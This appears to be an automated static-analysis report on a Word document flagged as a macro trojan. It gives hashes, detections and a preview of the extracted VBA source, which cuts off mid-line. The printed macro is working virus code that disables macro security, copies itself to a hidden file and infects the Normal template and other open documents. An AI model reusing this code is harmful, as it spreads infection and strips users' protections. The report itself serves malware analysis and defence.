Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2cffadb3ad14f82f…

MALICIOUS

Office (OLE)

Size: 37.0 KB
Created: 2000-11-14 18:10:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 108f40fb92a1ba38b80ec3e4a3e1f650
SHA-1: 832bad8baee1289d8914efe7168caace63ca0e65
SHA-256: 2cffadb3ad14f82fbcc8c26eec0cef1091e87a8330fca3378422a93d8b026e7b
Risk Score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code within Office documents. The script attempts to lower macro security settings and remove itself upon document closure, indicating an effort to evade detection. The ClamAV detections suggest it is a known trojan.

Heuristics (3)

  • ClamAV: Win.Trojan.Psycho-3 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]: Document contains VBA macro code
  • Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 29645 bytes
SHA-256: 63464db4458724cac3ff9ccef942366f37af9a5a1cc44a3f64d835046b964b3d
Detection: ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDoc"
Attribute VB_Base = "1Normal.ThisDoc"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
  CommandBars("Macro").Controls("Security...").Enabled = False
  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
  Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Application.EnableCancelKey = Not -1
CountofDocs = Documents.Count
For Doc = 0 To CountofDocs
If Documents.Item(Doc).VBProject.VBComponents.Item(1).Name <> "ThisDoc" Then
Set t = Documents.Item(Doc).VBProject.VBComponents.Item(1)

s = Documents.Item(Doc).Saved

begin = 1
If t.CodeModule.Find("Document_Open()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
ElseIf t.CodeModule.Find("Document_Close()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
Else
begin = 1
If t.CodeModule.Find("ToolsMacro()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
Else
begin = 1
If t.CodeModule.Find("Filetemplates()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
Else
begin = 1
If t.CodeModule.Find("ViewVBCode()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
End If
End If
End If
End If

Open "c:\hawk.___" For Input As #1
If LOF(1) = 0 Then GoTo q
i = 1
Do While Not EOF(1)
Line Input #1, a
t.CodeModule.InsertLines i, a
i = i + 1
Loop
q:
Close #1
t.Name = "ThisDoc"
If Left(Documents.Item(Doc).Name, 8) <> "Document" Then Documents.Item(Doc).SaveAs FileName:=ActiveDocument.FullName
If Documents.Item(Doc).Saved <> s Then Documents.Item(Doc).Saved = s
End If
Next Doc

SetAttr "c:\hawk.___", 0
Kill "c:\hawk.___"
End Sub

Private Sub Document_Open()

On Error Resume Next

Randomize

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
  CommandBars("Macro").Controls("Security...").Enabled = False
  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
  Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

If Dir("c:\hawk.___", 6) = "" Then
Open "c:\hawk.___" For Output As #1
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, a
Next i
Close #1
SetAttr "c:\hawk.___", 6
End If

If NormalTemplate.VBProject.VBComponents.Item(1).Name <> "ThisDoc" Then
Set t = NormalTemplate.VBProject.VBComponents.Item(1)

begin = 1
If t.CodeModule.Find("Document_Open()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
Else
begin = 1
If t.CodeModule.Find("Document_Close()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
Else
begin = 1
If t.CodeModule.Find("ToolsMacro()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeModule.DeleteLines begin
Next Line
Else
begin = 1
If t.CodeModule.Find("Filetemplates()", begin, 1, t.CodeModule.CoundOfLines, 1) = True Then
For Line = 0 To t.CodeModule.CountOfLines
t.CodeMo
... (truncated)